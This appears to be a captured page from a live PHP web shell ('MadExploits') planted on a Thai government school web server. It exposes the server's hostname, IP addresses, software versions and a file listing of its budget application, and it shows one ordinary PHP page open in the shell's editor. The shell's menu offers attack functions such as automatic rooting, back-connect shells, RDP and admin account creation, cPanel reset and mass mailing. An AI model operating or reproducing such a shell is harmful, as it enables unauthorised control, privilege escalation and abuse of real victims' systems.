Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
budget /
category /
[ HOME SHELL ]
Name
Size
Permission
Action
ajax_type.php
862
B
-rwxr-xr-x
ajax_type2.php
836
B
-rwxr-xr-x
edit_category.php
1.37
KB
-rwxr-xr-x
edit_type.php
15.1
KB
-rwxr-xr-x
key_activity.php
11.02
KB
-rwxr-xr-x
money_source.php
11.05
KB
-rwxr-xr-x
pay_type.php
11.65
KB
-rwxr-xr-x
plan_project.php
10.85
KB
-rwxr-xr-x
proj_product.php
11.01
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_category.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); if($result_permission['p2']!=1){ exit(); } ?> <br /> <table width="100%" border="0" align="center"> <tr> <td><div align="center"> <p><font color="#006666" size="3"><strong>ประเภท(หลัก)ของเงิน</strong></font></p> </div></td> </tr> </table> <br /> <?php $sql = "select * from budget_category order by category_id"; $dbquery = mysqli_query($connect,$sql); echo "<table width=50% border=0 align=center>"; echo "<Tr bgcolor=#FFCCCC align=center class=style2><Td>รหัส</Td><Td>ประเภท(หลัก)</Td></Tr>"; $M=1; While ($result = mysqli_fetch_array($dbquery)) { $id = $result['id']; $category_id= $result['category_id']; $category_name = $result['category_name']; if(($M%2) == 0) $color="#FFFFFF"; else $color="#FFFFC"; echo "<Tr bgcolor=$color align=center class=style1><Td>$category_id</Td><Td align=left>$category_name</Td> </Tr>"; $M++; } echo "<Tr><Td colspan='2' align='left'>*เพจนี้ ไม่สามารถปรับแก้ได้ เจตนาแสดงเพื่อทำความเข้าใจในเบื้องต้นถึงประเภทของเงิน</Td></Tr>"; echo "</Table>"; ?>
Close